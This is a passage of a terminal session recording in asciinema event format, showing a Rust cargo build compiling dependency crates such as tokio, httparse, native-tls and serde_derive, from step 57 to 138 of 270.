[22.777508, "o", "\u001b[1m\u001b[36m Building\u001b[0m [====> ] 57/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, tracing-core, log, thiserror(build), icu_locid_transform_data(build), mio, icu_normalizer_data(build), un...\r"]
|
||||
[22.803035, "o", "\u001b[1m\u001b[36m Building\u001b[0m [====> ] 58/270: icu_locid_transform_data, num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, tracing-core, log, thiserror(build), mio, icu_normalizer_data(build), unsafe-li...\r"]
|
||||
[22.83338, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m httparse v1.10.1\r\n"]
|
||||
[22.833504, "o", "\u001b[1m\u001b[36m Building\u001b[0m [====> ] 59/270: icu_locid_transform_data, num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, tracing-core, httparse(build.rs), thiserror(build), mio, icu_normalizer_data(bu...\r"]
|
||||
[22.83581, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m core-foundation v0.9.4\r\n"]
|
||||
[22.835833, "o", "\u001b[1m\u001b[36m Building\u001b[0m [====> ] 60/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, tracing-core, httparse(build.rs), thiserror(build), core-foundation, mio, icu_normalizer_data(build), uns...\r"]
|
||||
[22.836268, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m fastrand v2.3.0\r\n\u001b[1m\u001b[36m Building\u001b[0m [====> ] 61/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, tracing-core, httparse(build.rs), thiserror(build), fastrand, core-foundation, icu_normalizer_data(build)...\r"]
|
||||
[22.941203, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m tracing v0.1.41\r\n"]
|
||||
[22.941376, "o", "\u001b[1m\u001b[36m Building\u001b[0m [====> ] 62/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, tracing-core, httparse(build.rs), thiserror(build), core-foundation, tracing, icu_normalizer_data(build),...\r"]
|
||||
[22.981021, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=====> ] 63/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, tracing-core, thiserror(build), httparse(build), core-foundation, tracing, icu_normalizer_data(build), un...\r"]
|
||||
[23.021436, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m utf8_iter v1.0.4\r\n"]
|
||||
[23.021547, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=====> ] 64/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, tracing-core, utf8_iter, thiserror(build), httparse(build), tracing, icu_normalizer_data(build), unsafe-l...\r"]
|
||||
[23.038774, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m write16 v1.0.0\r\n"]
|
||||
[23.038804, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=====> ] 65/270: num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, tracing-core, write16, utf8_iter, thiserror(build), httparse(build), icu_normalizer_data(build), unsafe-l...\r"]
|
||||
[23.055807, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m utf16_iter v1.0.5\r\n"]
|
||||
[23.055835, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=====> ] 66/270: utf16_iter, num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, write16, utf8_iter, thiserror(build), httparse(build), icu_normalizer_data(build), unsafe-lib...\r"]
|
||||
[23.074201, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m try-lock v0.2.5\r\n"]
|
||||
[23.07423, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=====> ] 67/270: utf16_iter, num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, try-lock, utf8_iter, thiserror(build), httparse(build), icu_normalizer_data(build), unsafe-li...\r"]
|
||||
[23.082638, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m security-framework-sys v2.14.0\r\n"]
|
||||
[23.082663, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=====> ] 68/270: utf16_iter, num-traits(build), rustix(build), icu_properties_data(build), getrandom(build), syn, security-framework-sys, try-lock, thiserror(build), httparse(build), icu_normalizer_data(buil...\r"]
|
||||
[23.086985, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=====> ] 69/270: utf16_iter, rustix(build), icu_properties_data(build), getrandom(build), syn, security-framework-sys, num-traits, try-lock, thiserror(build), httparse(build), icu_normalizer_data(build), uns...\r"]
|
||||
[23.107838, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m want v0.3.1\r\n\u001b[1m\u001b[36m Building\u001b[0m [=====> ] 70/270: rustix(build), icu_properties_data(build), getrandom(build), syn, security-framework-sys, num-traits, try-lock, thiserror(build), httparse(build), want, icu_normalizer_data(build), unsafe-li...\r"]
|
||||
[23.114348, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m http-body v0.4.6\r\n"]
|
||||
[23.11446, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=====> ] 71/270: rustix(build), icu_properties_data(build), getrandom(build), syn, security-framework-sys, num-traits, thiserror(build), httparse(build), http-body, want, icu_normalizer_data(build), unsafe-l...\r"]
|
||||
[23.167457, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m percent-encoding v2.3.1\r\n"]
|
||||
[23.167557, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=====> ] 72/270: rustix(build), icu_properties_data(build), getrandom(build), syn, percent-encoding, num-traits, thiserror(build), httparse(build), http-body, want, icu_normalizer_data(build), unsafe-libyaml \r"]
|
||||
[23.173471, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m httpdate v1.0.3\r\n"]
|
||||
[23.173495, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======> ] 73/270: rustix(build), icu_properties_data(build), getrandom(build), syn, percent-encoding, httpdate, num-traits, thiserror(build), httparse(build), http-body, icu_normalizer_data(build), unsafe-lib...\r"]
|
||||
[23.212014, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m tower-service v0.3.3\r\n"]
|
||||
[23.212044, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======> ] 74/270: rustix(build), icu_properties_data(build), getrandom(build), syn, percent-encoding, httpdate, num-traits, tower-service, thiserror(build), httparse(build), icu_normalizer_data(build), unsafe...\r"]
|
||||
[23.244991, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m native-tls v0.2.14\r\n"]
|
||||
[23.245021, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======> ] 75/270: rustix(build), icu_properties_data(build), getrandom(build), syn, httpdate, num-traits, tower-service, native-tls(build.rs), thiserror(build), httparse(build), icu_normalizer_data(build), un...\r\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m form_urlencoded v1.2.1\r\n"]
|
||||
[23.24516, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======> ] 76/270: rustix(build), icu_properties_data(build), getrandom(build), syn, httpdate, num-traits, native-tls(build.rs), thiserror(build), httparse(build), form_urlencoded, icu_normalizer_data(build), ...\r"]
|
||||
[23.280024, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m security-framework v2.11.1\r\n"]
|
||||
[23.280156, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======> ] 77/270: rustix(build), icu_properties_data(build), getrandom(build), syn, num-traits, native-tls(build.rs), security-framework, thiserror(build), httparse(build), form_urlencoded, icu_normalizer_dat...\r"]
|
||||
[23.291052, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m system-configuration-sys v0.5.0\r\n"]
|
||||
[23.291221, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======> ] 78/270: rustix(build), icu_properties_data(build), getrandom(build), syn, num-traits, native-tls(build.rs), system-configuration-sys(build.rs), security-framework, thiserror(build), httparse(build),...\r"]
|
||||
[23.325386, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m synstructure v0.13.1\r\n"]
|
||||
[23.325527, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======> ] 79/270: rustix(build), icu_properties_data(build), getrandom(build), syn, num-traits, native-tls(build.rs), system-configuration-sys(build.rs), security-framework, thiserror(build), httparse(build),...\r"]
|
||||
[23.330716, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======> ] 80/270: rustix(build), icu_properties_data(build), getrandom(build), syn, num-traits, system-configuration-sys(build.rs), security-framework, thiserror(build), httparse(build), native-tls(build), sy...\r"]
|
||||
[23.340335, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======> ] 81/270: icu_properties_data(build), getrandom(build), syn, num-traits, system-configuration-sys(build.rs), security-framework, thiserror(build), httparse(build), native-tls(build), synstructure, icu...\r"]
|
||||
[23.380593, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======> ] 82/270: system-configuration-sys(build), icu_properties_data(build), getrandom(build), syn, num-traits, security-framework, thiserror(build), httparse(build), native-tls(build), synstructure, icu_no...\r"]
|
||||
[23.429561, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m num-integer v0.1.46\r\n"]
|
||||
[23.42969, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======> ] 83/270: system-configuration-sys(build), icu_properties_data(build), getrandom(build), syn, num-integer, security-framework, thiserror(build), httparse(build), native-tls(build), synstructure, icu_n...\r"]
|
||||
[23.434159, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=======> ] 84/270: system-configuration-sys(build), getrandom(build), syn, num-integer, security-framework, thiserror(build), icu_properties_data, httparse(build), native-tls(build), synstructure, icu_normaliz...\r"]
|
||||
[23.516165, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m aho-corasick v1.1.3\r\n"]
|
||||
[23.516195, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=======> ] 85/270: system-configuration-sys(build), getrandom(build), syn, aho-corasick, num-integer, security-framework, thiserror(build), httparse(build), native-tls(build), synstructure, icu_normalizer_data...\r"]
|
||||
[23.601166, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m lazy_static v1.5.0\r\n"]
|
||||
[23.601196, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=======> ] 86/270: system-configuration-sys(build), getrandom(build), syn, aho-corasick, lazy_static, security-framework, thiserror(build), httparse(build), native-tls(build), synstructure, icu_normalizer_data...\r"]
|
||||
[23.613656, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m bitflags v1.3.2\r\n"]
|
||||
[23.613682, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=======> ] 87/270: system-configuration-sys(build), getrandom(build), syn, aho-corasick, lazy_static, security-framework, thiserror(build), httparse(build), bitflags, native-tls(build), icu_normalizer_data(bui...\r"]
|
||||
[23.638898, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m regex-syntax v0.8.5\r\n"]
|
||||
[23.639053, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=======> ] 88/270: system-configuration-sys(build), regex-syntax, getrandom(build), syn, aho-corasick, security-framework, thiserror(build), httparse(build), bitflags, native-tls(build), icu_normalizer_data(bu...\r"]
|
||||
[23.642064, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m base64 v0.21.7\r\n"]
|
||||
[23.642168, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=======> ] 89/270: system-configuration-sys(build), regex-syntax, getrandom(build), syn, aho-corasick, base64, security-framework, thiserror(build), httparse(build), native-tls(build), icu_normalizer_data(buil...\r"]
|
||||
[23.7033, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m utf8parse v0.2.2\r\n"]
|
||||
[23.703481, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=======> ] 90/270: system-configuration-sys(build), utf8parse, regex-syntax, getrandom(build), syn, aho-corasick, base64, security-framework, httparse(build), native-tls(build), icu_normalizer_data(build), rustix\r"]
|
||||
[23.747399, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m anstyle-parse v0.2.6\r\n"]
|
||||
[23.747622, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=======> ] 91/270: system-configuration-sys(build), regex-syntax, getrandom(build), syn, aho-corasick, base64, security-framework, httparse(build), anstyle-parse, native-tls(build), icu_normalizer_data(build),...\r"]
|
||||
[23.810049, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m rustls-pemfile v1.0.4\r\n"]
|
||||
[23.810086, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=======> ] 92/270: system-configuration-sys(build), regex-syntax, getrandom(build), syn, aho-corasick, security-framework, rustls-pemfile, httparse(build), anstyle-parse, native-tls(build), icu_normalizer_data...\r"]
|
||||
[23.826972, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m num-bigint v0.4.6\r\n"]
|
||||
[23.826999, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=======> ] 93/270: system-configuration-sys(build), regex-syntax, getrandom(build), syn, aho-corasick, num-bigint, security-framework, rustls-pemfile, httparse(build), native-tls(build), icu_normalizer_data(bu...\r"]
|
||||
[23.908947, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m encoding_rs v0.8.35\r\n"]
|
||||
[23.908978, "o", "\u001b[1m\u001b[36m Building\u001b[0m [========> ] 94/270: system-configuration-sys(build), regex-syntax, getrandom(build), syn, aho-corasick, num-bigint, encoding_rs, security-framework, httparse(build), native-tls(build), icu_normalizer_data(build...\r"]
|
||||
[23.92933, "o", "\u001b[1m\u001b[36m Building\u001b[0m [========> ] 95/270: system-configuration-sys(build), getrandom, regex-syntax, syn, aho-corasick, num-bigint, encoding_rs, security-framework, httparse(build), native-tls(build), icu_normalizer_data(build), rustix \r"]
|
||||
[24.004068, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m tempfile v3.19.1\r\n"]
|
||||
[24.004095, "o", "\u001b[1m\u001b[36m Building\u001b[0m [========> ] 96/270: system-configuration-sys(build), tempfile, regex-syntax, syn, aho-corasick, num-bigint, encoding_rs, security-framework, httparse(build), native-tls(build), icu_normalizer_data(build), rustix \r"]
|
||||
[24.007109, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m version_check v0.9.5\r\n"]
|
||||
[24.00727, "o", "\u001b[1m\u001b[36m Building\u001b[0m [========> ] 97/270: system-configuration-sys(build), tempfile, regex-syntax, syn, aho-corasick, num-bigint, encoding_rs, security-framework, httparse(build), version_check, native-tls(build), icu_normalizer_dat...\r"]
|
||||
[24.043623, "o", "\u001b[1m\u001b[36m Building\u001b[0m [========> ] 98/270: system-configuration-sys(build), tempfile, regex-syntax, syn, aho-corasick, num-bigint, encoding_rs, icu_normalizer_data, security-framework, httparse(build), version_check, native-tls(build) \r"]
|
||||
[24.068188, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m either v1.15.0\r\n"]
|
||||
[24.068525, "o", "\u001b[1m\u001b[36m Building\u001b[0m [========> ] 99/270: system-configuration-sys(build), tempfile, regex-syntax, syn, aho-corasick, num-bigint, encoding_rs, icu_normalizer_data, httparse(build), version_check, native-tls(build), either \r"]
|
||||
[24.08646, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m anstyle v1.0.10\r\n"]
|
||||
[24.086583, "o", "\u001b[1m\u001b[36m Building\u001b[0m [========> ] 100/270: system-configuration-sys(build), tempfile, regex-syntax, syn, aho-corasick, num-bigint, encoding_rs, httparse(build), anstyle, version_check, native-tls(build), either \r"]
|
||||
[24.167709, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m signal-hook v0.3.17\r\n"]
|
||||
[24.16779, "o", "\u001b[1m\u001b[36m Building\u001b[0m [========> ] 101/270: system-configuration-sys(build), tempfile, regex-syntax, syn, aho-corasick, num-bigint, encoding_rs, signal-hook(build.rs), httparse(build), anstyle, version_check, native-tls(build) \r"]
|
||||
[24.198748, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m anstyle-query v1.1.2\r\n"]
|
||||
[24.198821, "o", "\u001b[1m\u001b[36m Building\u001b[0m [========> ] 102/270: system-configuration-sys(build), tempfile, regex-syntax, syn, aho-corasick, num-bigint, encoding_rs, signal-hook(build.rs), httparse(build), anstyle, anstyle-query, native-tls(build) \r"]
|
||||
[24.213334, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m colorchoice v1.0.3\r\n\u001b[1m\u001b[36m Building\u001b[0m [========> ] 103/270: system-configuration-sys(build), tempfile, regex-syntax, syn, aho-corasick, num-bigint, encoding_rs, signal-hook(build.rs), colorchoice, httparse(build), anstyle-query, native-tls(build) \r"]
|
||||
[24.248936, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m mime v0.3.17\r\n\u001b[1m\u001b[36m Building\u001b[0m [========> ] 104/270: system-configuration-sys(build), tempfile, regex-syntax, syn, aho-corasick, num-bigint, encoding_rs, mime, signal-hook(build.rs), colorchoice, httparse(build), native-tls(build) \r"]
|
||||
[24.260788, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m is_terminal_polyfill v1.70.1\r\n"]
|
||||
[24.261031, "o", "\u001b[1m\u001b[36m Building\u001b[0m [========> ] 105/270: system-configuration-sys(build), regex-syntax, syn, aho-corasick, num-bigint, encoding_rs, mime, signal-hook(build.rs), colorchoice, httparse(build), is_terminal_polyfill, native-tls(build) \r"]
|
||||
[24.264716, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m sync_wrapper v0.1.2\r\n"]
|
||||
[24.264777, "o", "\u001b[1m\u001b[36m Building\u001b[0m [========> ] 106/270: system-configuration-sys(build), regex-syntax, syn, aho-corasick, num-bigint, encoding_rs, mime, signal-hook(build.rs), sync_wrapper, httparse(build), is_terminal_polyfill, native-tls(build) \r"]
|
||||
[24.26859, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m ipnet v2.11.0\r\n"]
|
||||
[24.26867, "o", "\u001b[1m\u001b[36m Building\u001b[0m [========> ] 107/270: system-configuration-sys(build), ipnet, regex-syntax, syn, aho-corasick, num-bigint, encoding_rs, mime, sync_wrapper, httparse(build), is_terminal_polyfill, native-tls(build) \r"]
|
||||
[24.269272, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m serde_derive v1.0.219\r\n"]
|
||||
[24.269318, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=========> ] 108/270: system-configuration-sys(build), serde_derive, ipnet, regex-syntax, aho-corasick, num-bigint, encoding_rs, mime, sync_wrapper, httparse(build), is_terminal_polyfill, native-tls(build) \r"]
|
||||
[24.300797, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m zerofrom-derive v0.1.6\r\n"]
|
||||
[24.30086, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=========> ] 109/270: system-configuration-sys(build), serde_derive, ipnet, regex-syntax, aho-corasick, num-bigint, encoding_rs, zerofrom-derive, mime, sync_wrapper, httparse(build), native-tls(build) \r"]
|
||||
[24.314188, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m yoke-derive v0.7.5\r\n"]
|
||||
[24.314355, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=========> ] 110/270: system-configuration-sys(build), serde_derive, ipnet, regex-syntax, yoke-derive, aho-corasick, num-bigint, encoding_rs, zerofrom-derive, mime, httparse(build), native-tls(build) \r"]
|
||||
[24.358675, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m zerovec-derive v0.10.3\r\n"]
|
||||
[24.358726, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=========> ] 111/270: system-configuration-sys(build), serde_derive, ipnet, regex-syntax, yoke-derive, aho-corasick, num-bigint, zerovec-derive, encoding_rs, zerofrom-derive, mime, native-tls(build) \r"]
|
||||
[24.409688, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m displaydoc v0.2.5\r\n\u001b[1m\u001b[36m Building\u001b[0m [=========> ] 112/270: system-configuration-sys(build), serde_derive, ipnet, regex-syntax, yoke-derive, aho-corasick, num-bigint, zerovec-derive, encoding_rs, zerofrom-derive, displaydoc, native-tls(build) \r"]
|
||||
[24.599591, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m tokio-macros v2.5.0\r\n\u001b[1m\u001b[36m Building\u001b[0m [=========> ] 113/270: system-configuration-sys(build), serde_derive, ipnet, tokio-macros, regex-syntax, yoke-derive, aho-corasick, num-bigint, zerovec-derive, encoding_rs, zerofrom-derive, displaydoc \r"]
|
||||
[24.643663, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m futures-macro v0.3.31\r\n"]
|
||||
[24.643744, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=========> ] 114/270: system-configuration-sys(build), serde_derive, ipnet, tokio-macros, regex-syntax, yoke-derive, num-bigint, zerovec-derive, encoding_rs, zerofrom-derive, displaydoc, futures-macro \r"]
|
||||
[24.659942, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m icu_provider_macros v1.5.0\r\n"]
|
||||
[24.660005, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=========> ] 115/270: system-configuration-sys(build), serde_derive, icu_provider_macros, tokio-macros, regex-syntax, yoke-derive, num-bigint, zerovec-derive, encoding_rs, zerofrom-derive, displaydoc, futures-macro \r"]
|
||||
[24.706738, "o", "\u001b[K"]
|
||||
[24.706797, "o", "\u001b[1m\u001b[32m Compiling\u001b[0m thiserror-impl v1.0.69\r\n\u001b[1m\u001b[36m Building\u001b[0m [=========> ] 116/270: system-configuration-sys(build), serde_derive, icu_provider_macros, tokio-macros, regex-syntax, yoke-derive, zerovec-derive, encoding_rs, zerofrom-derive, displaydoc, futures-macro, thiserro...\r"]
|
||||
[24.829133, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=========> ] 117/270: system-configuration-sys(build), serde_derive, icu_provider_macros, tokio-macros, regex-syntax, yoke-derive, zerovec-derive, encoding_rs, zerofrom-derive, httparse, futures-macro, thiserror-...\r"]
|
||||
[24.844696, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=========> ] 118/270: serde_derive, icu_provider_macros, native-tls, tokio-macros, regex-syntax, yoke-derive, zerovec-derive, encoding_rs, zerofrom-derive, httparse, futures-macro, thiserror-impl \r"]
|
||||
[24.935985, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==========> ] 119/270: serde_derive, native-tls, tokio-macros, regex-syntax, yoke-derive, zerovec-derive, encoding_rs, zerofrom-derive, httparse, futures-macro, system-configuration-sys, thiserror-impl \r"]
|
||||
[24.974286, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m regex-automata v0.4.9\r\n"]
|
||||
[24.974336, "o", "\u001b[1m\u001b[36m Building\u001b[0m "]
|
||||
[24.97454, "o", "[==========> ] 120/270: serde_derive, native-tls, tokio-macros, regex-syntax, zerovec-derive, encoding_rs, regex-automata, zerofrom-derive, httparse, futures-macro, system-configuration-sys, thiserror-impl \r"]
|
||||
[24.996321, "o", "\u001b[K"]
|
||||
[24.996368, "o", "\u001b[1m\u001b[32m Compiling\u001b[0m tokio v1.44.1\r\n"]
|
||||
[24.996527, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==========> ] 121/270: serde_derive, native-tls, regex-syntax, zerovec-derive, encoding_rs, regex-automata, zerofrom-derive, tokio, httparse, futures-macro, system-configuration-sys, thiserror-impl \r"]
|
||||
[25.002432, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m system-configuration v0.5.1\r\n"]
|
||||
[25.002466, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==========> ] 122/270: serde_derive, native-tls, regex-syntax, zerovec-derive, encoding_rs, regex-automata, zerofrom-derive, tokio, system-configuration, httparse, futures-macro, thiserror-impl \r"]
|
||||
[25.007122, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m num-rational v0.4.2\r\n\u001b[1m\u001b[36m Building\u001b[0m [==========> ] 123/270: serde_derive, native-tls, regex-syntax, encoding_rs, regex-automata, zerofrom-derive, tokio, system-configuration, httparse, num-rational, futures-macro, thiserror-impl \r"]
|
||||
[25.032568, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m anstream v0.6.18\r\n"]
|
||||
[25.033282, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==========> ] 124/270: serde_derive, native-tls, regex-syntax, encoding_rs, regex-automata, zerofrom-derive, tokio, system-configuration, anstream, num-rational, futures-macro, thiserror-impl \r"]
|
||||
[25.059859, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m zerofrom v0.1.6\r\n\u001b[1m\u001b[36m Building\u001b[0m "]
|
||||
[25.059907, "o", "[==========> ] 125/270: serde_derive, native-tls, regex-syntax, encoding_rs, regex-automata, tokio, system-configuration, anstream, num-rational, zerofrom, futures-macro, thiserror-impl \r"]
|
||||
[25.075759, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==========> ] 126/270: serde_derive, regex-syntax, encoding_rs, regex-automata, tokio, system-configuration, anstream, num-rational, zerofrom, signal-hook(build), futures-macro, thiserror-impl \r"]
|
||||
[25.164447, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m ahash v0.8.11\r\n"]
|
||||
[25.164496, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==========> ] 127/270: serde_derive, regex-syntax, encoding_rs, regex-automata, tokio, ahash(build.rs), anstream, num-rational, zerofrom, signal-hook(build), futures-macro, thiserror-impl \r"]
|
||||
[25.165147, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m futures-util v0.3.31\r\n"]
|
||||
[25.168247, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==========> ] 128/270: serde_derive, regex-syntax, futures-util, encoding_rs, regex-automata, tokio, ahash(build.rs), anstream, num-rational, zerofrom, signal-hook(build), thiserror-impl \r"]
|
||||
[25.213807, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m num-iter v0.1.45\r\n"]
|
||||
[25.214192, "o", "\u001b[1m\u001b[36m Building\u001b[0m [==========> ] 129/270: serde_derive, regex-syntax, futures-util, encoding_rs, regex-automata, tokio, ahash(build.rs), anstream, num-rational, zerofrom, num-iter, thiserror-impl \r"]
|
||||
[25.236125, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m num-complex v0.4.6\r\n\u001b[1m\u001b[36m Building\u001b[0m [===========> ] 130/270: serde_derive, regex-syntax, futures-util, num-complex, encoding_rs, regex-automata, tokio, ahash(build.rs), num-rational, zerofrom, num-iter, thiserror-impl \r"]
|
||||
[25.278473, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m crossbeam-utils v0.8.21\r\n"]
|
||||
[25.278525, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===========> ] 131/270: serde_derive, regex-syntax, futures-util, num-complex, encoding_rs, regex-automata, tokio, ahash(build.rs), num-rational, zerofrom, thiserror-impl, crossbeam-utils(build.rs) \r"]
|
||||
[25.307289, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m anyhow v1.0.98\r\n"]
|
||||
[25.307434, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===========> ] 132/270: serde_derive, regex-syntax, futures-util, num-complex, encoding_rs, regex-automata, anyhow(build.rs), tokio, num-rational, zerofrom, thiserror-impl, crossbeam-utils(build.rs) \r"]
|
||||
[25.338384, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m num-conv v0.1.0\r\n"]
|
||||
[25.338438, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===========> ] 133/270: serde_derive, regex-syntax, futures-util, num-complex, regex-automata, anyhow(build.rs), tokio, num-rational, zerofrom, num-conv, thiserror-impl, crossbeam-utils(build.rs) \r"]
|
||||
[25.409289, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m rustix v0.38.44\r\n"]
|
||||
[25.409339, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===========> ] 134/270: serde_derive, regex-syntax, futures-util, rustix(build.rs), num-complex, regex-automata, anyhow(build.rs), tokio, num-rational, zerofrom, thiserror-impl, crossbeam-utils(build.rs) \r"]
|
||||
[25.447503, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m strsim v0.11.1\r\n"]
|
||||
[25.447618, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===========> ] 135/270: serde_derive, regex-syntax, futures-util, rustix(build.rs), strsim, num-complex, regex-automata, anyhow(build.rs), tokio, num-rational, zerofrom, thiserror-impl \r"]
|
||||
[25.467725, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===========> ] 136/270: thiserror, serde_derive, regex-syntax, futures-util, rustix(build.rs), strsim, num-complex, regex-automata, anyhow(build.rs), tokio, num-rational, zerofrom \r"]
|
||||
[25.473512, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m rustversion v1.0.20\r\n"]
|
||||
[25.473567, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===========> ] 137/270: thiserror, serde_derive, rustversion(build.rs), regex-syntax, futures-util, rustix(build.rs), strsim, num-complex, regex-automata, tokio, num-rational, zerofrom \r"]
|
||||
[25.477253, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m time-core v0.1.4\r\n"]
|
||||
[25.477339, "o", "\u001b[1m\u001b[36m Building\u001b[0m [===========> ] 138/270: thiserror, serde_derive, rustversion(build.rs), regex-syntax, futures-util, rustix(build.rs), strsim, num-complex, time-core, regex-automata, tokio, zerofrom \r"]
|
||||
